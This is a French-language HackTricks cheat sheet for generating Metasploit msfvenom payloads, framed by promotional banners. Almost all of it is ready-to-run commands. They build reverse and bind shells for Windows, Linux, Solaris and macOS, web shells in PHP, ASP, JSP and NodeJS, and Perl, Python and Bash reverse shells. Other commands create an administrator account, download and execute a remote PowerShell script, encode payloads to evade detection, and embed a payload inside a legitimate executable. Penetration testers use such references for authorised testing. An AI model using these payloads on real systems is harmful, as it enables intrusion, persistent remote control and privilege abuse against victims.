Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks) ! Autres façons de soutenir HackTricks :
Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF , consultez les PLANS D'ABONNEMENT !
Rejoignez le serveur HackenProof Discord pour communiquer avec des pirates expérimentés et des chasseurs de primes en bugs !
Perspectives de piratage
Engagez-vous avec du contenu qui explore le frisson et les défis du piratage
Actualités de piratage en temps réel
Restez à jour avec le monde du piratage en évolution rapide grâce aux actualités et aux informations en temps réel
Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme
Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs pirates dès aujourd'hui !
Msfvenom de base
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
On peut également utiliser le -a
pour spécifier l'architecture ou la --platform
Listing
Copy msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
Paramètres courants lors de la création d'un shellcode
Copy -b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC = thread
PrependSetuid = True #Use this to create a shellcode that will execute something with SUID
Shell Inversé
Copy msfvenom -p windows/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f exe > reverse.exe
Coquille de liaison
Copy msfvenom -p windows/meterpreter/bind_tcp RHOST= ( IP Address ) LPORT= ( Your Port ) -f exe > bind.exe
Créer un utilisateur
Copy msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
Shell CMD
Copy msfvenom -p windows/shell/reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f exe > prompt.exe
Exécuter une commande
Copy msfvenom -a x86 --platform Windows -p windows/exec CMD= "powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD= "net localgroup administrators shaun /add" -f exe > pay.exe
Encodeur
Copy msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
Intégré à l'intérieur de l'exécutable
Copy msfvenom -p windows/shell_reverse_tcp LHOST= < I P > LPORT= < POR T > -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
Charges Linux
Shell Inversé
Copy msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
Coquille de liaison
Copy msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= ( IP Address ) LPORT= ( Your Port ) -f elf > bind.elf
SunOS (Solaris)
Copy msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST= ( ATTACKER IP ) LPORT= ( ATTACKER PORT ) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
Charges MAC
Shell Inversé:
Copy msfvenom -p osx/x86/shell_reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f macho > reverse.macho
Shell de liaison
Copy msfvenom -p osx/x86/shell_bind_tcp RHOST= ( IP Address ) LPORT= ( Your Port ) -f macho > bind.macho
Charges utiles basées sur le Web
PHP
Shell inversé
Copy msfvenom -p php/meterpreter_reverse_tcp LHOST= < I P > LPORT= < POR T > -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP/x
Shell inversé
Copy msfvenom -p windows/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f aspx > reverse.aspx
JSP
Shell inversé
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f ra w > reverse.jsp
NodeJS
Copy msfvenom -p nodejs/shell_reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port )
Chargements de langage de script
Perl
Copy msfvenom -p cmd/unix/reverse_perl LHOST= ( IP Address ) LPORT= ( Your Port ) -f raw > reverse.pl
Python
Copy msfvenom -p cmd/unix/reverse_python LHOST= ( IP Address ) LPORT= ( Your Port ) -f raw > reverse.py
Bash
Copy msfvenom -p cmd/unix/reverse_bash LHOST= < Local IP Addres s > LPORT= < Local Por t > -f raw > shell.sh
Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de bugs !
Perspectives de piratage
Engagez-vous avec du contenu qui explore les sensations et les défis du piratage
Actualités de piratage en temps réel
Restez à jour avec le monde du piratage en évolution rapide grâce aux actualités et aux informations en temps réel
Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme
Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks) ! Autres façons de soutenir HackTricks :
Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF Consultez les PLANS D'ABONNEMENT !